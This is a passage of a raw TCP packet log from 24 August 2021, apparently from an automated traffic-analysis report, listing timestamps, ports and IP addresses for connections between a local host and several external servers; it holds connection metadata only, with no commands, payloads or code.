Aug 24, 2021 08:49:24.034926891 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.034946918 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.034969091 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.034990072 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.035010099 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.035033941 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.035054922 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.035073996 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.035096884 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.035098076 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035135984 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035139084 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035141945 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035145044 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035146952 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.035147905 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035151005 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035154104 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035156012 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035159111 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035161972 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035165071 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035167933 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035171032 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035171986 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.035172939 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035176039 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035178900 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035182953 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035185099 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035187960 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035197020 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.035213947 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035233021 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035271883 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.035303116 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.035324097 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.035346985 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.035351038 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035371065 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.035371065 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035393953 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.035413027 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035478115 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.035506010 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.035509109 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035525084 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035528898 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.035551071 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.035566092 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035573006 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.035594940 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.035597086 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035615921 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.035624027 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035639048 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.035662889 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035665035 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.035687923 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.035697937 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.035710096 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.035731077 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037281036 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.037305117 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.037314892 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037345886 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037373066 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037398100 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037420988 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037445068 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037467003 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037491083 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037516117 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037539005 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037564039 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037587881 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037611008 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037636042 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037661076 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037683964 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037708044 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037729025 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.037731886 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037739038 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.037741899 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.037744999 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.037748098 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.037750959 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.037753105 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.037755966 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.037759066 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.037760019 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037761927 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.037786007 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037790060 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.037808895 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037825108 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.037832022 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037857056 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037867069 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.037879944 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037903070 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037903070 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.037926912 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037947893 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.037952900 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.037971020 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.037977934 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.038002014 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.038008928 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.038024902 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.038033009 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.038049936 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.038054943 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.038074970 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.038079977 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.038099051 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.038106918 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.038120031 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:24.038146973 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.038160086 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.038183928 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.287527084 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:24.289402962 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:26.931135893 CEST	49719	14462	192.168.2.5	185.230.143.48
Aug 24, 2021 08:49:26.980822086 CEST	14462	49719	185.230.143.48	192.168.2.5
Aug 24, 2021 08:49:26.980942965 CEST	49719	14462	192.168.2.5	185.230.143.48
Aug 24, 2021 08:49:26.991795063 CEST	49719	14462	192.168.2.5	185.230.143.48
Aug 24, 2021 08:49:27.041625977 CEST	14462	49719	185.230.143.48	192.168.2.5
Aug 24, 2021 08:49:27.122420073 CEST	49719	14462	192.168.2.5	185.230.143.48
Aug 24, 2021 08:49:27.274310112 CEST	49719	14462	192.168.2.5	185.230.143.48
Aug 24, 2021 08:49:27.324516058 CEST	14462	49719	185.230.143.48	192.168.2.5
Aug 24, 2021 08:49:27.330250978 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:27.330310106 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:27.352791071 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:27.380386114 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:27.389930964 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:27.389987946 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:27.412520885 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:27.434545040 CEST	49719	14462	192.168.2.5	185.230.143.48
Aug 24, 2021 08:49:27.437546968 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:27.454819918 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:27.454896927 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:27.477353096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:27.501940966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:27.509788990 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:27.509865046 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:27.533229113 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:27.557979107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:27.622092962 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:27.636507034 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:27.636534929 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:27.658698082 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:27.682234049 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:27.731885910 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:27.751362085 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:27.751384974 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:27.773511887 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:27.798177004 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:27.806587934 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.830733061 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.831191063 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.831813097 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.855207920 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.855906010 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.856049061 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.856060982 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.856120110 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.856137037 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.856151104 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.856154919 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.856201887 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.856249094 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.856266975 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.856276989 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.856297970 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.856317043 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.856324911 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.856327057 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.856344938 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.856389046 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.856479883 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.856489897 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.856647015 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.879827976 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.879851103 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.879885912 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.879903078 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.879930019 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.879941940 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.879955053 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.879959106 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.879980087 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.880096912 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.880108118 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.880151033 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.880167961 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.880177975 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.880181074 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.880193949 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.880211115 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.880219936 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.880229950 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.880235910 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.880250931 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.880251884 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.880261898 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.880278111 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.880299091 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.880309105 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.880309105 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.880348921 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.880364895 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.880378962 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.880384922 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.880394936 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.880414963 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.880415916 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.880425930 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.880445957 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.880460978 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.880477905 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.880484104 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.880513906 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.903390884 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.903443098 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.903450966 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.903481007 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.903512001 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.903520107 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.903584003 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.903601885 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.903762102 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.903789997 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.903811932 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.903825045 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.903875113 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.903881073 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.903882980 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.903913975 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.903928995 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.903940916 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.903949022 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.903978109 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904004097 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904011965 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904015064 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.904064894 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.904175043 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904247999 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904269934 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904280901 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904306889 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904314995 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904323101 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.904339075 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904369116 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904370070 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.904376030 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904406071 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904417992 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904438972 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.904453993 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904474020 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904475927 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.904486895 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904511929 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904534101 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.904536009 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904555082 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904577017 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904606104 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904618025 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904624939 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904635906 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904647112 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904659033 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904664993 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.904665947 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904680967 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904685974 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.904692888 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904709101 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904716015 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904716015 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.904731035 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904742956 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904747963 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.904755116 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904769897 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904777050 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904788017 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904793024 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.904798985 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904805899 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.904812098 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.904819012 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.905029058 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.927551031 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.927576065 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.927603960 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.927618027 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.927639961 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.927648067 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.927658081 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.927680016 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.927690983 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.927712917 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.927714109 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.927731991 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.927745104 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.927750111 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.927761078 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.927777052 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.927782059 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.927798986 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.927820921 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.927833080 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.927853107 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.927948952 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.927968025 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.927990913 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.927993059 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.928000927 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928020954 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.928025007 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928042889 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928076029 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928093910 CEST	2080	49720	185.49.70.90	192.168.2.5
